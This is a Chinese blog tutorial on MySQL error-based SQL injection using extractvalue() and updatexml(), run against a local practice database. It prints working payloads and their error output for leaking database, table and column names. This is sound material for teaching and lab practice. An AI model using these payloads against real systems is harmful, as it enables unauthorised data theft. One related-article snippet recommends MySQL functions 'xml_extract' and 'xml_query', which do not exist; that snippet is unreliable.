sql注入中报错注入函数extractvalue和updatexml函数的原理及使用

最新推荐文章于 2024-03-31 15:18:21 发布
最新推荐文章于 2024-03-31 15:18:21 发布
阅读量6k 收藏 34
点赞数 11
分类专栏: 网络安全 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46145442/article/details/110254238
版权

小小目录

extractvalue函数原理

这是一个对xml文件进行查询的函数,更准确地说,它是会从目标xml文件中返回所包含查询值的字符串,标准语法为:

extractvalue('XML_document','Xpath_string')
//即
extractvalue('目标xml文件名','在xml中查询的字符串')

看得出来第二个参数要求的是Xpath格式的字符串,语法正确是会按照路径
/该xml文件/要查询的字符串 进行查询(这里涉及到Xpath语法,未了解深,不知道此处表达是否会有误),如果我们输入的Xpath_string不对就会报错,而如果页面回显sql报错信息就可以得到我们想要的信息了。

  • 此处的XML_document可以是anything。
示例

本文mysql版本:5.7.26
Xpath没问题的情况下

mysql> select (extractvalue(1,(database())));
+--------------------------------+
| (extractvalue(1,(database()))) |
+--------------------------------+
|                                |
+--------------------------------+
1 row in set (0.00 sec)
//在1中查询不到database()的结果,但是也没有语法错误,所以不会报错

concat函数拼接一个错误的Xpath让mysql报错得到包含查询值的字符串

mysql> select (extractvalue(1,concat(0x7e,database())));
ERROR 1105 (HY000): XPATH syntax error: '~security'

修改database()部分可以爆表、列、值。

值得注意的是,extractvalue函数一次只能查询32位长度,在爆表、列、值的时候

  1. 需要加上limit x,1逐一查询
    mysql> select 1,2,(extractvalue(1,concat(0x7e,(select table_name from 
information_schema.tables where table_schema = 'security' limit 0,1))));
ERROR 1105 (HY000): XPATH syntax error: '~emails'
  2. 用group_concat函数把查询结果分组聚合,然后用and xxxxx not in 'xxx','xxx'过滤掉前面回显的
    mysql> select 1,2,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name= 'users' ))));
ERROR 1105 (HY000): XPATH syntax error: '~user_id,first_name,last_name,us'
//以上用group_concat未过滤的只能显示32位长度
mysql> select 1,2,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_name= 'users' and column_name not in ('user_id','first_name','last_name')))));
ERROR 1105 (HY000): XPATH syntax error: '~user,password,avatar,last_login'
//注意:我在编辑md时手动回车了。
  3. substring()函数截取
    mysql> select (extractvalue(1,concat(0x7e,substring(hex((select database())),1,32))));
ERROR 1105 (HY000): XPATH syntax error: '~7365637572697479'
//substring(hex(aaa),x,y)中,x为从起始偏移值,y为长度,可变

updatexml函数

顺便讲一下这个函数,跟extractvalue基本相同。
顾名思义,这是个修改xml文件的函数,标准语法为:

updatexml('XML_document','Xpath_string','New_value')
//即
updatexml('目标xml文件名','在xml中查询的字符串','替换后的值')

其他都一样。
PS:据说高版本的mysql已经修复了该bug

示例

这里只给报错payload:

mysql> select (updatexml(1,concat(0x7e,(database()),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~security~'
//第二个0x7e可以略去,但是第二个1不可略去,会导致函数不完整的报错

bye

star2y9
关注
  • 11
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入原理及php防注入代码.doc
12-02
sql注入原理及php防注入代码.doc
discuz的php防止sql注入函数
12-17
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql防注入函数取了来! 复制代码 代码如下: $magic_quotes_gpc = get_magic_quotes_gpc(); @extract(daddslashes($_COOKIE)); @extract(daddslashes($_POST)); @extract(daddslashes($_GET)); if(!$magic_quotes_gpc) { $_FILES = daddslashes($_FIL
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml的位置是可操作的地方,xml文档查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
SQL注入——基于报错的注入【extractvalue()】篇
最新发布
2301_76437855的博客
03-31 294
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
C语言函数使用.zip
06-18
C语言函数使用.zip
Mysql数据库使用concat函数执行SQL注入查询
09-10
主要介绍了Mysql数据库使用concat函数执行SQL注入查询,concat函数SQL注入查询会有意想不到的作用,本文就起讲解它的使用,需要的朋友可以参考下
SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因
大大大蜜蜂的博客
10-12 4716
SQL报错型注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
SQL注入——extractValue()报错注入
heyingcheng的博客
03-06 2130
在实际的注入过程,查询的列(比如本例的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123。同理,从第31个字符开始显示,显示后面的30个字符。比如在本例把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。
SQL注入-报错注入
LJH1999ZN的博客
02-09 9665
sql注入报错注入的演示与介绍
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 893
报错注入是通过构造恶意SQL,使数据库报错,从报错信息得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
SQL注入-extractvalue报错注入
weixin_52613207的博客
06-11 422
出现报错注入的原因:报错注入是一种页面的响应形式,用户在前台页面输入检索内容,后台将前台页面上输入的检索内容无加区别地拼接成sql语句,送给数据库执行,数据库将执行结果返回给后台,后台将数据结果无加区别地显示到前台的页面上,简而言之就是后台对于输入输出的合理性没有检查。什么是报错注入:构造语句,让错误信息夹杂可以显示数据库内容的查询语句什么时候使用报错注入:查询无回显位的时候,使用报错注入(如图)
使用系统函数
04-02
使用系统函数.rar 介绍了关于使用系统函数的详细说明,提供其它知识的技术资料的下载。
SQL注入 报错(updatexmlextractvalue函数介绍)-01
09-15
SQL注入 报错(updatexmlextractvalue函数介绍)-01
sql注入与转义的php函数代码
01-20
sql注入:  正常情况下:  delete.php?id=3; $sql = ‘delete from news where id = ‘.$_GET[‘id’];  恶意情况:  delete.php?id=3 or 1; $sql = ‘delete from news where id = 3 or 1’; ——-如此执行后,...
SQL注入——基于报错的注入(1)
qq_52072846的博客
02-18 2476
实验目的 熟悉报错功能函数extractvalue的用法,掌握基于报错的SQL注入基本流程 实验原理 (1)关于报错注入 基干报错的注入,是指通讨构造特定的SOI语句,让攻击者想要查询的信息(如 数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函 数,对于一些SQL语句的错误直接回显在页面上:(2)后台未对一些具有报错 功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml(、fl
extractvalue报错注入理论及实战
走马
11-07 595
什么是报错注入构造语句,让错误信息夹杂可以显示数据库内容的查询语句,返回报错提示包括数据库的内容如上图所示,通过group by的报错,我们可以知道列数是多少输入正确的查询数据库的SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在报错信息显示了出来因此可以利用报错的信息得到我们想要的信息。1.通过floor()报错注入2.通过extractvalue()报错注入
OracleXMLType的简单操作(extractextractvalue
fengzhongdeluoyea的博客
09-01 2660
前几天一直在做Oracle对XMLType字段的操作,我还不是Oracle大拿,到网上找了很多资料,但是很多就是单一功能的介绍,不能很好的解决问题,现在在这里总结下。 1、下面先创建一个名未test.xml的配置文件。 <?xml version="1.0" encoding="UTF-8" ?> <collection xmlns=""> <record> <leader>-----nam0-22-----^
MySQL自带extractvalue解析XMLMySQL存储过程、游标
Konw Nothing
12-28 4380
表结构如下: 要求把每个xml消息的某个字段取出来。 方法一:把所有的xml消息导出用Java或Python解析; 方法二:用MySQlextractvalue解析,也正是所要讲的首先看看解析一条XML消息是怎么样的,在navicat执行下面的SQL SET @temp_xml = ' <?xml version="1.0" encoding="UTF-8"?> <MSG xmlns="ht
SQL注入,xpath函数updatexml()和extractvalue()报错注入原理
金 帛的博客
04-26 3254
SQL注入报错注入原理
extractvalue 用法
07-28
`extractvalue` 是一个用于提取 XML 数据的 SQL 函数。它的用法如下: ```sql EXTRACTVALUE(xml_data, xpath_expr) ``` 其,`xml_data` 是一个 XML 字符串或 XML 类型的列,`xpath_expr` 则是一个 XPath 表达式,用于指定要提取的数据。 `extractvalue` 函数会根据提供的 XPath 表达式在 XML 数据查找匹配的节点,并返回第一个匹配节点的值作为结果。如果没有找到匹配的节点,则返回空值。 需要注意的是,`extractvalue` 函数在较新的 MySQL 版本已被废弃,推荐使用安全XML 查询函数 `xml_extract` 或 `xml_query` 来替代。 ```sql -- 使用 xml_extract SELECT xml_extract(xml_data, xpath_expr) FROM table; -- 使用 xml_query SELECT xml_query(xpath_expr, xml_data) FROM table; ``` 这些函数提供了更全面和灵活的 XML 查询功能,并且能够更好地处理 XML 数据的命名空间和特殊字符。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值